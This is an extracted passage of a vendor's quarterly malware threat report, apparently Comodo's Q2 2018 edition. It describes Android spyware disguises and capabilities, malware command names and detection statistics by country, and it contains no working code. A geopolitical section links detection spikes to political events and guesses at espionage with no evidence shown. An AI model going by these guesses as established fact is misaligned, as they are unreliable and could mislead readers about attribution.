In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
